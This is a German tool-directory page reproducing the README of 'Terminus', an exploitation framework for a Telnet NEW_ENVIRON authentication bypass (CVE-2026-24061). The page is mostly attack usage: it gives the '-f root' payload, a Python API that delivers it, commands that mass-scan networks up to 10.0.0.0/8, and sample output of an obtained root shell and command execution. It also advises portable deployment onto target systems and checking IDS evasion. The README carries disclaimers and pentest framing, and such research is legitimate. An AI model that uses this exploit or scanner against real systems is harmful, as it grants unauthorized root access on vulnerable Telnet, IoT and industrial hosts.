Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Terrminus-CVE-2026-2406 — AsyncIO-Scanner & Exploitation-Framework für CVE-2026-24061 (Telnet NEW_ENVIRON Auth Bypass). Bietet hochparallele Erkennung, passives Fingerprinting und autorisierte Root-Shell-Eskalation. | Kitploit
Tools/GitHubGitHub/ridpath/terrminus-cve-2026-2406
Privilege EscalationAufklärungSchwachstellenscannerIoT-SicherheitExploitationSCADA/ICS-SicherheitInformationsbeschaffungWebsicherheitNetzwerksicherheit

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Penetrationstests
Red Teaming
GitHubridpath/terrminus-cve-2026-2406

Terrminus-CVE-2026-2406

AsyncIO-Scanner & Exploitation-Framework für CVE-2026-24061 (Telnet NEW_ENVIRON Auth Bypass). Bietet hochparallele Erkennung, passives Fingerprinting und autorisierte Root-Shell-Eskalation.

Repository anzeigen
28vor 7 MonatenNoch nicht geprüft

Terminus - CVE-2026-24061 Scanner & Exploitation Framework

Eine Sicherheitsanalyse-Engine für die CVE-2026-24061 Telnet NEW_ENVIRON-Authentifizierungs-Bypass- und Privilege-Escalation-Schwachstelle.

Terminus


Überblick

Terminus ist ein professionelles Sicherheitsforschungswerkzeug, das für autorisierte Penetrationstests und Schwachstellenbewertungen von CVE-2026-24061 entwickelt wurde. Diese kritische Schwachstelle betrifft Legacy-Telnet-Daemon-Implementierungen und ermöglicht unauthentifizierten Remote-Angreifern, die Authentifizierung zu umgehen und Root-Zugriff zu erlangen.

Was ist CVE-2026-24061?

CVE-2026-24061 ist eine Remote-Code-Execution-Schwachstelle in Telnet-Diensten, die RFC 1572 (Telnet Environment Option) unterstützen. Die Schwachstelle nutzt eine unsachgemäße Bereinigung der USER-Umgebungsvariable während der NEW_ENVIRON-Subnegotiation aus:

  • Normale Authentifizierung: USER=john → fordert zur Passworteingabe auf
  • Exploit-Payload: USER=-f root → umgeht die Authentifizierung, gewährt Root-Shell

Auswirkungen:

  • Vollständiger Authentifizierungs-Bypass (kein Passwort erforderlich)
  • Sofortige Privilege-Escalation auf Root
  • Vollständige Systemkompromittierung

Betroffene Dienste:

  • Legacy-Telnet GNU Inetutils telnetd (insbesondere Versionen bis 2.7)
  • IoT-Firmware mit verwundbaren Telnet-Implementierungen
  • Industrielle Steuerungssysteme mit veralteten Telnet-Diensten

Hauptfunktionen

Massen-Schwachstellen-Scanner

  • Hochparalleles Scannen: Scannt 1.000+ Ziele gleichzeitig mit AsyncIO
  • CIDR-Unterstützung: Scannt gesamte Netzwerkbereiche (192.168.0.0/24, 10.0.0.0/8)
  • Duale Erkennungsmodi:
    • Passiv (Standard): Schnell, sicher, signaturbasierte Erkennung
    • Aktive Verifizierung (--verify): Exploit-Nachweis, bestätigt uid=0 Root-Zugriff
  • Banner-Analyse: Fingerprinting von Daemon-Typen und -Versionen
  • Risikobewertung: Mehrschichtige Konfidenzbewertung (KRITISCH, HOCH, MITTEL, NIEDRIG)

RFC-konforme Protokoll-Engine

  • TerminusNegotiator-Klasse: Saubere API für Telnet-Protokolloperationen
    • Terminus.handshake() - RFC 854-konformer Handshake
    • Terminus.exploit() - CVE-2026-24061 Payload-Zustellung
  • Korrekte Optionsaushandlung: Vermeidet IDS/IPS-Erkennung durch Protokollkonformität
  • Zustandsmaschine: Robuste Verarbeitung von IAC-Sequenzen (DO/DONT/WILL/WONT/SB/SE)

Autorisierungsgesteuerte Exploitation

  • Interaktive Shell: Vollständige Post-Exploitation-Shell mit Root-Zugriff
  • Befehlsausführung: Einzelne Befehle ausführen und Ausgabe erfassen
  • Beweissammlung: uid, Umgebungsvariablen, Systeminformationen erfassen
  • Sicherheitsmechanismen:
    • Erfordert explizites --exploit-Flag
    • Im Batch-Scan-Modus deaktiviert
    • Audit-Protokollierung aller Exploitation-Versuche

Multi-Format-Berichterstattung

  • Terminal: Rich-formattierte Tabellen mit farbcodierten Risikostufen
  • JSON: SIEM/SOAR-Integration
  • CSV: Tabellenkalkulations-Tracking
  • HTML: Detaillierte Berichte mit Statistiken
  • Markdown: Dokumentationsfreundliche Ausgabe

Architektur

Kern-Engine: TerminusNegotiator

Das Herzstück von Terminus ist die TerminusNegotiator-Klasse, die eine saubere Trennung zwischen Protokollbehandlung und Exploitation-Logik bietet:```python from terminus import TerminusNegotiator

Initialize engine

negotiator = TerminusNegotiator()

Step 1: RFC 854 compliant handshake

await negotiator.handshake(target="192.168.1.100", port=23)

Step 2: Deliver CVE-2026-24061 payload

result = await negotiator.exploit(payload="-f root")

if result.success: print(f"Root shell acquired: {result.evidence['uid']}")

root@kitploit:~
### Engine vs. Script-Ansatz

**Traditionelle Skripte** (bestehende Tools):```
Target → Raw Socket → Payload → Blind Execution → Hope for Shell

Terminus-Engine:``` Target → Discovery → RFC Handshake → Passive Analysis → Risk Assessment ↓ [Optional] Verified Exploitation → Evidence Collection → Report

root@kitploit:~
---

## Installation

### Anforderungen
- **Python 3.10+**
- **Unterstützte Plattformen:**
  - Windows 10/11 (PowerShell)
  - Windows + WSL2 (Kali Linux, Parrot OS, Ubuntu)
  - Natives Linux (Kali, Parrot, Ubuntu, Debian)
  - macOS (mit Python 3.10+)

### Schnellstart (Alle Plattformen)

#### Windows (PowerShell)```powershell
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git

# Run setup script
.\setup_env.ps1

# Activate virtual environment
.venv\Scripts\Activate.ps1

# Verify installation
terminus --version

Linux / WSL2 / macOS (Bash)```bash

Clone repository

git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git cd Terminus-CVE-2025-2406

Run setup script

chmod +x setup_env.sh ./setup_env.sh

Activate virtual environment

source venv/bin/activate

Verify installation

terminus --version

root@kitploit:~
#### Manuelle Installation (Alle Plattformen)```bash
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git
cd Terrminus-CVE-2026-2406

# Create virtual environment
python3 -m venv venv

# Activate (Linux/macOS/WSL)
source venv/bin/activate

# Activate (Windows PowerShell)
# venv\Scripts\Activate.ps1

# Install dependencies
pip install -e .

# Verify
terminus --version

Abhängigkeiten (Plattformübergreifend)

  • telnetlib3 – AsyncIO-Telnet-Protokollimplementierung
  • rich – Terminal-UI und Formatierung (ANSI-Unterstützung unter Windows/Linux)
  • pydantic – Datenvalidierung und Modelle
  • aiofiles – Asynchrone Datei-E/A
  • jinja2 – Berichtsvorlagen
  • pyyaml – Konfigurationsverwaltung
  • pathlib – Plattformübergreifende Pfadbehandlung (integriert)

Hinweis: Alle Abhängigkeiten sind reines Python oder verfügen über plattformübergreifende Wheels. Keine plattformspezifische Kompilierung erforderlich.


Shell-Vervollständigung (Optional)

Aktivieren Sie die Tab-Vervollständigung für eine schnellere Befehlseingabe:

Bash```bash

_TERMINUS_COMPLETE=bash_source terminus > ~/.terminus-complete.bash echo 'source ~/.terminus-complete.bash' >> ~/.bashrc source ~/.bashrc

root@kitploit:~
### Zsh```bash
_TERMINUS_COMPLETE=zsh_source terminus > ~/.terminus-complete.zsh
echo 'source ~/.terminus-complete.zsh' >> ~/.zshrc
source ~/.zshrc

Fish```bash

_TERMINUS_COMPLETE=fish_source terminus > ~/.config/fish/completions/terminus.fish

root@kitploit:~
### PowerShell```powershell
# Add to $PROFILE
_TERMINUS_COMPLETE=powershell_source terminus | Out-String | Invoke-Expression

Testen Sie es:```bash terminus # Shows: scan, exploit, version terminus scan - # Shows: -t, -f, -p, --verify, etc.

root@kitploit:~
---

## Verwendung

### Scan-Modi

#### Einzelziel-Scan```bash
terminus scan -t 192.168.1.100

CIDR-Bereichs-Scan```bash

terminus scan -t 192.168.1.0/24

root@kitploit:~
#### Dateibasierter Batch-Scan```bash
# targets.txt contains one IP/CIDR per line
terminus scan -f targets.txt --threads 500

Hochparalleler Netzwerkscan```bash

terminus scan -t 10.0.0.0/8 --threads 1000 --rate-limit 200

root@kitploit:~
### Erkennungsmodi

#### Passive Erkennung (Standard – sicher)```bash
terminus scan -t target.com --passive-only

Aggressive Erkennung (Alle Heuristiken)```bash

terminus scan -t target.com --aggressive

root@kitploit:~
#### Aktiver Verifizierungsmodus (Proof-of-Exploit)```bash
terminus scan -t 192.168.1.100 --verify

Verwendung

Live-Demonstration

Version prüfen:```powershell PS C:\terminus> terminus --version Terminus v1.0.0 CVE-2026-24061 Telnet NEW_ENVIRON Scanner & Exploitation Framework Signatures database: C:\terminus\signatures.db

root@kitploit:~
**Passiver Scan (Standard – konservative Risikobewertung):**```powershell
PS C:\terminus> python -m terminus scan -t 172.17.45.122 -p 2323

================================================================
                        TERMINUS
       CVE-2026-24061 Scanner & Exploitation Framework
================================================================

Parsing 1 targets...
Found 1 valid targets

  Scanning 1 targets... ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% (1/1) Vulnerable: 0 0:00:00

╭────── Scan Summary ──────╮
│ CVE: CVE-2026-24061      │
│ Total Targets: 1         │
│ Scanned: 1               │
│ Failed: 0                │
│ Timeouts: 0              │
│                          │
│ Vulnerability Breakdown: │
│   Critical: 0            │
│   High: 0                │
│   Medium: 0              │
│   Low: 1                 │
│   Info: 0                │
│                          │
│ Duration: 3.53s          │
│ Avg Scan Time: 3522.22ms │
│                          │
╰──────────────────────────╯

                                 Terminus - CVE-2026-24061 Scan Results
╭───────────────┬──────┬───────────┬──────┬─────────┬─────────┬─────────────┬──────────┬───────────────╮
│ Target        │ Port │  Status   │ Risk │ Daemon  │ Version │ NEW_ENVIRON │ Verified │ Duration (ms) │
├───────────────┼──────┼───────────┼──────┼─────────┼─────────┼─────────────┼──────────┼───────────────┤
│ 172.17.45.122 │ 2323 │ completed │ Low  │ unknown │ Unknown │     YES     │    -     │       3522.22 │
╰───────────────┴──────┴───────────┴──────┴─────────┴─────────┴─────────────┴──────────┴───────────────╯

No vulnerable targets found

Aktive Verifizierung mit --verify (Proof-of-Exploit):```powershell PS C:\terminus> python -m terminus scan -t 172.17.45.122 -p 2323 --verify

================================================================ TERMINUS CVE-2026-24061 Scanner & Exploitation Framework

Parsing 1 targets... Found 1 valid targets

Scanning 1 targets... ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% (1/1) Vulnerable: 1 0:00:00

╭────── Scan Summary ──────╮ │ CVE: CVE-2026-24061 │ │ Total Targets: 1 │ │ Scanned: 1 │ │ Failed: 0 │ │ Timeouts: 0 │ │ │ │ Vulnerability Breakdown: │ │ Critical: 1 │ │ High: 0 │ │ Medium: 0 │ │ Low: 0 │ │ Info: 0 │ │ │ │ Duration: 8.04s │ │ Avg Scan Time: 8029.55ms │ │ │ ╰──────────────────────────╯

root@kitploit:~
                               Terminus - CVE-2026-24061 Scan Results

╭───────────────┬──────┬───────────┬──────────┬─────────┬─────────┬─────────────┬──────────┬───────────────╮ │ Target │ Port │ Status │ Risk │ Daemon │ Version │ NEW_ENVIRON │ Verified │ Duration (ms) │ ├───────────────┼──────┼───────────┼──────────┼─────────┼─────────┼─────────────┼──────────┼───────────────┤ │ 172.17.45.122 │ 2323 │ completed │ Critical │ unknown │ Unknown │ YES │ ROOT │ 8029.55 │ ╰───────────────┴──────┴───────────┴──────────┴─────────┴─────────┴─────────────┴──────────┴───────────────╯

Found 1 vulnerable targets!

root@kitploit:~
**Interaktive Ausnutzung:**```powershell
PS C:terminus> python -m terminus exploit -t 172.17.45.122 -p 2323 --yes

================================================================
                        TERMINUS
       CVE-2026-24061 Scanner & Exploitation Framework
================================================================

Attempting exploitation of 172.17.45.122:2323...
Payload: -f root

CVE-2026-24061 exploitation attempt initiated with payload: -f root
CVE-2026-24061 exploitation SUCCESSFUL - root access obtained

[*] CVE-2026-24061 Interactive Shell Started
[*] Type 'exit' or press Ctrl+C to quit

whoami
root
┌──[root@parrot]─[~]
└──╼ #

Wichtige Beobachtungen:

  • Passiver Modus: NEW_ENVIRON-Unterstützung erkannt, aber geringes Risiko gemeldet (konservativ)
  • Aktive Verifizierung: Root-Zugriff bestätigt (uid=0), auf KRITISCHES Risiko mit „ROOT“-Verifizierungsstatus hochgestuft
  • Ausnutzung: Sofortige Root-Shell ohne Passwortabfrage

Was es tut:

  • Führt zuerst eine passive Erkennung durch (Banner + Protokollanalyse)
  • Bei Verdacht auf eine Schwachstelle wird ein tatsächlicher Exploit-Versuch mit dem -f root-Payload durchgeführt
  • Bestätigt den Root-Zugriff durch Prüfung von uid=0 in der Antwort
  • Stuft das Risiko auf KRITISCH hoch, wenn der Root-Zugriff bestätigt wird
  • Gibt den Verifizierungsstatus in den Scan-Ergebnissen aus

Anwendungsfälle:

  • Hochsichere Validierung für Compliance-Berichte
  • Proof-of-Concept-Demonstrationen
  • Bestätigung der Ausnutzbarkeit vor der Meldung an Hersteller
  • Red-Team-Operationen, die eine Beweissammlung erfordern

Beispielausgabe:``` Target Port Status Daemon Risk Verified 192.168.1.100 23 VULNERABLE inetutils-telnetd CRITICAL ROOT ACCESS 192.168.1.101 23 VULNERABLE netkit-telnetd HIGH Not tested 192.168.1.102 23 SAFE OpenBSD-telnetd LOW N/A

root@kitploit:~
**Batch-Überprüfung:**```bash
terminus scan -f targets.txt --verify -o json -w verified_results.json

Hinweis: Die aktive Verifizierung versucht eine Ausnutzung. Nur mit entsprechender Autorisierung verwenden.

Ausgabeformate

JSON-Ausgabe```bash

terminus scan -t 192.168.1.0/24 -o json > results.json

root@kitploit:~
#### HTML-Bericht```bash
terminus scan -f targets.txt -o html -w report.html

CSV-Export```bash

terminus scan -t 10.0.0.0/24 -o csv > vulnerabilities.csv

root@kitploit:~
### Exploitation (Nur für autorisierte Nutzung)

#### Interaktive Shell```bash
terminus exploit -t 192.168.1.100
# Requires confirmation prompt
# Grants root shell on vulnerable target

Befehlsausführung```bash

terminus exploit -t 192.168.1.100 -c "id"

Output: uid=0(root) gid=0(root) groups=0(root)

root@kitploit:~
#### Custom Payload```bash
terminus exploit -t 192.168.1.100 --payload "-f admin"

Dienstprogramm-Befehle

Schwachstellensignaturen aktualisieren```bash

terminus update-signatures

root@kitploit:~
#### Vorherige Ergebnisse verifizieren```bash
terminus verify -f results.json

Version und Signaturen anzeigen```bash

terminus version

root@kitploit:~
---

## Einrichtung der Testumgebung

### Für Red Team: Plattformübergreifende Bereitstellung

**Terminus ist für die portable Bereitstellung konzipiert** – kopieren Sie das Verzeichnis auf ein beliebiges Windows-/Linux-System und führen Sie es ohne Installation aus:```bash
# Copy terminus directory to target system
# No hardcoded paths - everything is relative

# Run directly (no installation needed)
cd terminus
python3 -m terminus scan -t 192.168.1.0/24

# All output stays in project directory:
# - Logs: ./logs/terminus.log
# - Reports: ./reports/
# - Config: ./config.yaml

WSL2-Testumgebung (Windows)

Empfohlen für Windows-Red-Team-Workstations – isolierte Linux-Umgebung zum Bereitstellen verwundbarer Testdienste:

WSL2 mit Kali oder Parrot installieren```powershell

Windows PowerShell (Admin)

Install WSL2

wsl --install

Install Kali Linux

wsl --install -d kali-linux

OR Install Parrot OS (if available)

wsl --install -d ParrotOS

Verify

wsl -l -v

root@kitploit:~
#### Innerhalb von WSL2 (Kali/Parrot)```bash
# Update system
sudo apt update && sudo apt upgrade -y

# Install Terminus dependencies
sudo apt install python3 python3-pip python3-venv

# Install testing tools
sudo apt install netkit-telnetd telnetd wireshark tcpdump

# Clone and setup Terminus
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406
cd Terminusb-CVE-2026-2406
./setup_env.sh
source venv/bin/activate

Verwundbaren Testdienst bereitstellen (nur WSL2)

WARNUNG: Nur in isolierten Laborumgebungen. Niemals auf Produktionssystemen.```bash

Inside WSL2

Install vulnerable netkit-telnetd version

sudo apt install netkit-telnetd=0.17-*

Configure for NEW_ENVIRON support

Edit /etc/inetd.conf to enable telnet

Start service

sudo systemctl restart inetd

Test from Windows host

From PowerShell:

terminus scan -t $(wsl hostname -I)

root@kitploit:~
### Plattformübergreifende Testmatrix

Teste Terminus auf allen Plattformen, die von deinem Red Team verwendet werden:

| Plattform | Installation | Scannen | Ausnutzung |
|----------|-------------|----------|--------------|
| Windows 10/11 (PowerShell) | Ja | Ja | Ja |
| WSL2 - Kali Linux | Ja | Ja | Ja |
| WSL2 - Parrot OS | Ja | Ja | Ja |
| WSL2 - Ubuntu | Ja | Ja | Ja |
| Natives Kali Linux | Ja | Ja | Ja |
| Natives Parrot OS | Ja | Ja | Ja |
| macOS | Ja | Ja | Ja |

---

## API-Referenz

### Python-Integration```python
import asyncio
from terminus import TerminusScanner, TerminusExploiter, TerminusNegotiator
from terminus.reporting.models import RiskScore

async def scan_network():
    # High-level scanner
    async with TerminusScanner() as scanner:
        async for result in scanner.scan_targets(["192.168.1.0/24"]):
            if result.risk_score == RiskScore.CRITICAL:
                print(f"CRITICAL: {result.target}")
                print(f"   Daemon: {result.daemon_type} {result.version}")
                print(f"   Confidence: {result.vulnerability_confidence:.2%}")

async def exploit_target():
    # Direct engine usage
    negotiator = TerminusNegotiator()
    
    # Handshake
    success = await negotiator.handshake(target="192.168.1.100", port=23)
    if not success:
        print("Handshake failed")
        return
    
    # Exploit
    result = await negotiator.exploit(payload="-f root")
    if result.success:
        print(f"Root access obtained")
        print(f"Evidence: {result.evidence}")

# Run
asyncio.run(scan_network())

Sicherheit & Ethik

Rechtlicher Hinweis

Dieses Tool ist AUSSCHLIESSLICH bestimmt für:

  • Autorisierte Penetrationstest-Aufträge
  • Sicherheitsforschung in kontrollierten Umgebungen
  • CTF-Wettbewerbe und Bildungslabore
  • Defensive Sicherheitsbewertungen mit schriftlicher Genehmigung

Unbefugte Nutzung ist ILLEGAL und unethisch.

Sicherheitsmechanismen

  1. Autorisierung erforderlich: Ausnutzung erfordert das explizite --exploit-Flag
  2. Bestätigungsabfragen: Interaktive Bestätigung vor der Ausnutzung
  3. Audit-Protokollierung: Alle Ausnutzungsversuche werden mit Zeitstempeln protokolliert
  4. Einzelziel-Durchsetzung: Ausnutzung im Batch-Scan-Modus deaktiviert
  5. Ratenbegrenzung: Verhindert versehentliche DoS-Angriffe während des Scans

Verantwortungsvolle Offenlegung

Wenn Sie mit Terminus verwundbare Systeme entdecken:

  1. NICHT Systeme ohne schriftliche Genehmigung ausnutzen
  2. Ergebnisse den Systemeigentümern durch verantwortungsvolle Offenlegung melden
  3. Befunde mit den Berichtsfunktionen von Terminus dokumentieren
  4. Koordinierte Richtlinien zur Offenlegung von Schwachstellen befolgen

Referenzen

CVE-Informationen

  • CVE-ID: CVE-2026-24061
  • Schweregrad: KRITISCH (CVSS 9.8)
  • Vektor: Netzwerk, Unauthentifiziert, Geringe Komplexität

Forschung & Implementierung

  • Primärforschung: SafeBreach-Labs CVE-2026-24061
  • Referenz-Exploit: telnet_rce.py
  • Batch-Scanner: TryA9ain CVE-2026-24061

Protokollstandards

  • RFC 854: Telnet-Protokollspezifikation
  • RFC 1572: Telnet-Umgebungsoption

Tests & Validierung

Testabdeckung

  • 90%+ Codeabdeckung mit pytest
  • Unit-Tests für alle Kernmodule
  • Integrationstests mit Mock-Telnet-Server
  • Leistungsbenchmarks (1.000 Ziele < 60 Sekunden)

Manuelle Test-Checkliste

  • Verwundbaren Dienst scannen (Erkennung verifizieren)
  • Gepatchten Dienst scannen (keine Fehlalarme verifizieren)
  • Authentifizierungsumgehung testen (keine Passwortabfrage)
  • Privilegieneskalation verifizieren (uid=0)
  • IDS-Warnungen überwachen (Tarnung verifizieren)
  • Leistungstest (1.000+ Ziele)

Konfiguration

config.yaml (Plattformübergreifend)

Alle Pfade sind relativ zum Projektstamm – funktioniert ohne Änderungen unter Windows, Linux und WSL:```yaml

config.yaml - Cross-platform configuration

All paths relative to project directory

scanner: default_port: 23 connect_timeout: 3.0 handshake_timeout: 5.0 max_concurrent: 1000 rate_limit: 100 # connections/second

detection: passive_only: true # Safe mode by default banner_timeout: 2.0 heuristic_checks: true

Signature database (relative path)

signatures_db: "./signatures.db"

exploit: require_authorization: true default_payload: "-f root" evidence_collection: true interactive_shell: true

reporting: default_format: "terminal" include_safe_targets: false verbosity: "normal"

Output directory (relative path - works on Windows/Linux)

output_dir: "./reports"

logging: level: "INFO"

Log file (relative path - automatic directory creation)

file: "./logs/terminus.log" format: "json" console_enabled: true


Acknowledgments

  • SafeBreach Labs: Original CVE-2026-24061 research and exploit implementation
  • TryA9ain: Batch scanning approach inspiration
  • RFC Authors: Telnet protocol specifications

Tool herunterladen